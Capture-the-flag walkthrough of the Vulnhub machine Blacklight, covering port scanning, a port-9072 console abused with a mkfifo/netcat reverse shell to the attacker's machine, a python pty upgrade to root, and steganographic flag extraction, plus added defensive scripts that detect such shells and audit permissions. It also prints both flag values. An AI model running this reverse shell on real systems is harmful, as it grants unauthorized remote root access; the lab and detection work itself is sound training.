Blacklight Walkthrough

Description

This box can also be found on vulnhub.com. There is no proper description, but I can say that the machine is good for newbies who want to learn.
Link: Blacklight on Vulnhub

Port scanning

The usual nmap scan returned the following:

root@kali:~# nmap -A -p- 192.168.43.246
Nmap scan report for blacklight (192.168.43.246)
Host is up (0.00020s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: BLACKLIGHT
9072/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, X11Probe:
|_    BLACKLIGHT console mk1. Type .help for instructions
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9072-TCP:V=7.70%I=7%D=8/15%Time=5B7442E6%P=x86_64-pc-linux-gnu%r(NU
SF:LL,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instr
SF:uctions\n")%r(GenericLines,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x
SF:20\.help\x20for\x20instructions\n")%r(GetRequest,34,"BLACKLIGHT\x20cons
SF:ole\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(HTTPOptions
SF:,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instruc
SF:tions\n")%r(RTSPRequest,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\
SF:.help\x20for\x20instructions\n")%r(RPCCheck,34,"BLACKLIGHT\x20console\x
SF:20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(DNSVersionBindRe
SF:qTCP,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20ins
SF:tructions\n")%r(DNSStatusRequestTCP,34,"BLACKLIGHT\x20console\x20mk1\.\
SF:x20Type\x20\.help\x20for\x20instructions\n")%r(Help,34,"BLACKLIGHT\x20c
SF:onsole\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SSLSessi
SF:onReq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20in
SF:structions\n")%r(TLSSessionReq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Ty
SF:pe\x20\.help\x20for\x20instructions\n")%r(Kerberos,34,"BLACKLIGHT\x20co
SF:nsole\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SMBProgNe
SF:g,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instru
SF:ctions\n")%r(X11Probe,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.h
SF:elp\x20for\x20instructions\n")%r(FourOhFourRequest,34,"BLACKLIGHT\x20co
SF:nsole\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(LPDString
SF:,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instruc
SF:tions\n")%r(LDAPSearchReq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x2
SF:0\.help\x20for\x20instructions\n")%r(LDAPBindReq,34,"BLACKLIGHT\x20cons
SF:ole\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SIPOptions,
SF:34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instruct
SF:ions\n")%r(LANDesk-RC,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.h
SF:elp\x20for\x20instructions\n")%r(TerminalServer,34,"BLACKLIGHT\x20conso
SF:le\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(NCP,34,"BLAC
SF:KLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n");
MAC Address: 08:00:27:44:1E:0A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.20 ms blacklight (192.168.43.246)
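The SF: block above is nmap's service fingerprint: one probe name, a hex byte count and an escaped reply per `%r(...)` entry. The fact worth reading out of it is that all 22 probes got the same 52-byte banner, so the port 9072 service replies before it reads anything. The following parser is an added example (my own code, not part of the original walkthrough or of nmap); its sample input is the first three probe/response pairs copied from the scan above.

```python
import re

# Constructed input: the first three probe/response pairs from the nmap
# service fingerprint above, exactly as nmap prints them (SF: continuations).
SAMPLE_FINGERPRINT = r'''
SF-Port9072-TCP:V=7.70%I=7%D=8/15%Time=5B7442E6%P=x86_64-pc-linux-gnu%r(NU
SF:LL,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instr
SF:uctions\n")%r(GenericLines,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x
SF:20\.help\x20for\x20instructions\n")%r(GetRequest,34,"BLACKLIGHT\x20cons
SF:ole\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n");
'''

# backslash escapes used by nmap: \xHH, \n, \r, \t, and "\." style quoting
_ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{2}|.)', re.DOTALL)
# one response entry: %r(ProbeName,hexlen,"escaped bytes")
_RESPONSE = re.compile(r'%r\(([^,]+),([0-9A-Fa-f]+),"((?:[^"\\]|\\.)*)"\)')
_HEADER = re.compile(r'^SF-Port(\d+)-(TCP|UDP):(.*)$', re.DOTALL)


def _unescape(s: str) -> bytes:
    """Turn nmap's escaped text back into the raw bytes the service sent."""
    simple = {'n': '\n', 'r': '\r', 't': '\t'}

    def repl(m):
        tok = m.group(1)
        if tok[0] == 'x' and len(tok) == 3:
            return chr(int(tok[1:], 16))
        return simple.get(tok, tok)  # '\.' -> '.', '\"' -> '"', '\\' -> '\'
    return _ESCAPE.sub(repl, s).encode('latin-1')


def parse_fingerprint(text: str) -> dict:
    """Rejoin the SF:-continued lines, then parse header fields and responses."""
    joined = ''.join(
        line.strip()[3:] if line.strip().startswith('SF:') else line.strip()
        for line in text.strip().splitlines()
    )
    m = _HEADER.match(joined)
    if not m:
        raise ValueError('not an nmap service fingerprint')
    port, proto, body = int(m.group(1)), m.group(2), m.group(3)
    head = body.split('%r(', 1)[0]            # V=..%I=..%D=..%Time=..%P=..
    fields = dict(kv.split('=', 1) for kv in head.split('%') if '=' in kv)
    responses = {}
    for probe, hexlen, payload in _RESPONSE.findall(body):
        data = _unescape(payload)
        if len(data) != int(hexlen, 16):      # the hex field is the byte count
            raise ValueError(f'length mismatch for probe {probe}')
        responses[probe] = data
    return {'port': port, 'proto': proto, 'fields': fields, 'responses': responses}


def probe_independent(fp: dict) -> bool:
    """True when every probe got the same reply: the service ignores its input."""
    return len(set(fp['responses'].values())) == 1


if __name__ == '__main__':
    fp = parse_fingerprint(SAMPLE_FINGERPRINT)
    print(fp['port'], fp['proto'], fp['fields'])
    for probe, data in fp['responses'].items():
        print(f'{probe:>14}: {data!r}')
    print('same banner for every probe:', probe_independent(fp))
```

A service that greets every probe identically is a banner-first line protocol, which is why the plain netcat session further down works without any handshake.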

The first flag

I started with the web server on port 80. There was nothing particularly interesting on the server except the robots.txt file, which revealed the first flag.

{flag1:fc4c7223964a26b152823d14f129687207e7fe15}

There was also a blacklight.dict file, but at this point, it was not useful. I went back to check out port 9072 with netcat:

root@kali:~# nc 192.168.43.246 9072
BLACKLIGHT console mk1. Type .help for instructions
.help
.readhash - Get one step closer
.exec <cmd> - Execute commands
.quit - Exit the server
.readhash
b5f4723bd6df85b54b0905bd6d734be9ef1cc1eb977413a932a828b5c52ef5a6
You have one more command until the server shuts down. Choose wisely!

Getting root access

I chose the easy way, but it got me nowhere. I tried to execute a command, but since its output was not sent back to me, I couldn't make use of it. Then, I tried executing different reverse shells from pentestmonkey's website.
The second netcat command was the winner:

.exec rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.5 443 >/tmp/f

Before executing the above command, I obviously set up a listener:

root@kali:~# nc -lp 443
/bin/sh: 0: can't access tty; job control turned off
# python -c 'import pty; pty.spawn("/bin/bash")'
root@blacklight:~#
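The mkfifo/netcat one-liner and the python pty upgrade are both very recognisable in a shell history or in an auditd EXECVE record, which is how a defender would notice this session. The detector below is an added example of mine, not code from the walkthrough; the sample command lines are constructed, with the third one being the exact command used above.

```python
import re

# Constructed sample: command lines as they might appear in .bash_history or
# an auditd EXECVE record. Index 2 is the command from the walkthrough above.
SAMPLE_COMMANDS = [
    "mkfifo /tmp/build.pipe",
    "nc -zv 192.168.43.246 80",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.5 443 >/tmp/f",
    "python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "tar czf backup.tgz /var/www/html",
]

NETCAT = r'\b(?:nc|ncat|netcat)\b'

INDICATORS = {
    # an interactive shell whose stdout is piped straight into netcat
    'shell_piped_to_netcat': re.compile(r'/bin/(?:ba)?sh\b[^|]*\|\s*' + NETCAT),
    # stderr merged into a pipe: the remote side wants to see errors as well
    'stderr_into_pipe': re.compile(r'2>&1\s*\|'),
    # a FIFO is created, netcat appears later, and its output is redirected
    # back into that same FIFO (the read/write loop of the relay)
    'fifo_netcat_relay': re.compile(r'mkfifo\s+(\S+).*' + NETCAT + r'.*>\s*\1\b'),
    # python spawning a pty around a shell, the usual "upgrade" step
    'pty_spawn': re.compile(r'pty\.spawn\('),
}


def classify(cmd: str) -> set:
    """Return the names of all indicators that fire on one command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmd)}


def is_reverse_shell(cmd: str) -> bool:
    """The strongest indicator alone is enough; weaker ones need a second hit."""
    hits = classify(cmd)
    return 'shell_piped_to_netcat' in hits or len(hits) >= 2


def scan(lines):
    """Return (line, sorted indicators) for every line judged suspicious."""
    return [(line, sorted(classify(line))) for line in lines if is_reverse_shell(line)]


if __name__ == '__main__':
    for line, hits in scan(SAMPLE_COMMANDS):
        print('SUSPICIOUS:', line)
        print('   indicators:', ', '.join(hits))
    for line in SAMPLE_COMMANDS:
        hits = classify(line)
        if hits and not is_reverse_shell(line):
            print('note only   :', line, '->', ', '.join(sorted(hits)))
```

The pty upgrade on its own only produces a note: on a developer box it is benign, but together with any of the other indicators it is a strong sign that an attacker is polishing an already-obtained shell.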

As you can see, I used python to upgrade to a pseudo-terminal and the shell had root privileges, which was awesome. I took the hint from the first flag and started searching in the home folder of the user blacklight.

root@blacklight:/home/blacklight# ls -la
total 48
drwxr-xr-x 6 blacklight blacklight 4096 Jun  7 23:49 .
drwxr-xr-x 3 root       root       4096 Jun  7 21:01 ..
-rw------- 1 blacklight blacklight 1019 Jun  8 00:24 .bash_history
-rw-r--r-- 1 blacklight blacklight  220 Apr  4 18:30 .bash_logout
-rw-r--r-- 1 blacklight blacklight 3771 Apr  4 18:30 .bashrc
drwx------ 2 blacklight blacklight 4096 Jun  7 21:01 .cache
-rwxrwxr-x 1 blacklight blacklight 1019 Jun  7 23:49 console.rb
drwx------ 3 blacklight blacklight 4096 Jun  7 21:01 .gnupg
-rw-r--r-- 1 root       root         65 Jun  7 21:56 hash.txt
drwxrwxr-x 3 blacklight blacklight 4096 Jun  7 22:27 .local
-rw-r--r-- 1 blacklight blacklight  666 Jun  7 21:27 .profile
drwxr-xr-x 2 root       root       4096 Jun  7 22:14 .secret
-rw-r--r-- 1 blacklight blacklight    0 Jun  7 21:01 .sudo_as_admin_successful
root@blacklight:/home/blacklight# cd .secret
cd .secret
root@blacklight:/home/blacklight/.secret# ls -la
total 28
drwxr-xr-x 2 root       root        4096 Jun  7 22:14 .
drwxr-xr-x 6 blacklight blacklight  4096 Jun  7 23:49 ..
-rw-r--r-- 1 root       root       19080 Jun  7 22:13 flag2-inside.jpg
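The listing above tells the story of the box from a hardening point of view: console.rb (the service answering on port 9072, which handed me a root shell) is group-writable, and hash.txt and .secret are root-owned files parked inside an ordinary user's home. The small audit script below is an added example of mine, not code from the walkthrough; its input is the long-format listing above with the . and .. entries dropped.

```python
import re

# Constructed input: the `ls -la /home/blacklight` output from the session
# above, minus the '.' and '..' entries.
SAMPLE_LISTING = """\
-rw------- 1 blacklight blacklight 1019 Jun  8 00:24 .bash_history
-rw-r--r-- 1 blacklight blacklight  220 Apr  4 18:30 .bash_logout
-rw-r--r-- 1 blacklight blacklight 3771 Apr  4 18:30 .bashrc
drwx------ 2 blacklight blacklight 4096 Jun  7 21:01 .cache
-rwxrwxr-x 1 blacklight blacklight 1019 Jun  7 23:49 console.rb
drwx------ 3 blacklight blacklight 4096 Jun  7 21:01 .gnupg
-rw-r--r-- 1 root       root         65 Jun  7 21:56 hash.txt
drwxrwxr-x 3 blacklight blacklight 4096 Jun  7 22:27 .local
-rw-r--r-- 1 blacklight blacklight  666 Jun  7 21:27 .profile
drwxr-xr-x 2 root       root       4096 Jun  7 22:14 .secret
-rw-r--r-- 1 blacklight blacklight    0 Jun  7 21:01 .sudo_as_admin_successful
"""

# type, nine mode characters, link count, owner, group, size, month, day, time/year, name
LINE = re.compile(
    r'^(?P<type>[-dl])(?P<mode>[rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)'
    r'\s+(?P<size>\d+)\s+\S+\s+\d+\s+[\d:]+\s+(?P<name>.+)$'
)


def parse_listing(text: str) -> list:
    """Parse `ls -l` lines into dicts; 'total N' and unparsable lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def audit(entries: list, home_owner: str) -> dict:
    """Return {name: [findings]} for entries that deserve a second look.

    Mode string positions: 0-2 user, 3-5 group, 6-8 other (r, w, x)."""
    findings = {}
    for e in entries:
        mode, notes = e['mode'], []
        if mode[4] == 'w':
            notes.append('group-writable')
        if mode[7] == 'w':
            notes.append('world-writable')
        executable = 'x' in (mode[2], mode[5], mode[8])
        if e['type'] == '-' and executable and 'w' in (mode[4], mode[7]):
            notes.append('executable that non-owners can modify')
        if e['owner'] != home_owner:
            notes.append(f"owned by {e['owner']} in {home_owner}'s home")
        if notes:
            findings[e['name']] = notes
    return findings


if __name__ == '__main__':
    for name, notes in audit(parse_listing(SAMPLE_LISTING), 'blacklight').items():
        print(f'{name:<12} {"; ".join(notes)}')
```

A script that anyone in the owning group can rewrite, and that a root-run service executes, is a privilege escalation path on its own; the fix is `chmod 755 console.rb` and running the console under an unprivileged account, not as root.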

The second flag

I found a picture in a hidden directory, which I moved to the web server directory …

root@blacklight:/home/blacklight/.secret# cd /var/www/html
root@blacklight:/var/www/html# ls
404.html         css        flag2-inside.jpg  footer  index.html  robots.txt
blacklight.dict  flag1.txt  fonts             img     js
root@blacklight:/var/www/html#

and downloaded it:

root@kali:~/Downloads# wget 192.168.43.246/flag2-inside.jpg
http://192.168.43.246/flag2-inside.jpg
Connecting to 192.168.43.246:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19080 (19K) [image/jpeg]
Saving to: ‘flag2-inside.jpg’

flag2-inside.jpg      100%[========================>]  18.63K  --.-KB/s    in 0s

(492 MB/s) - ‘flag2-inside.jpg’ saved [19080/19080]

flag2-inside.jpg

I forgot to mention that the .bash_history file contained commands showing how the creator had constructed this flag, so the hint was pretty clear. I installed the outguess program and used the -r switch to retrieve the hidden message, supplying the image and an output file called flag2.txt.

root@kali:~/Downloads# outguess -r flag2-inside.jpg flag2.txt
Reading flag2-inside.jpg....
Extracting usable bits:   18496 bits
Steg retrieve: seed: 180, len: 133

The final flag was:

{flag2:88ea7554cbc7e89526943e9ad5d3ce2ed5ec3db4}

Before you go

If you found this article helpful, please share it to help others with similar interests find it! Feedback and donations are always welcome!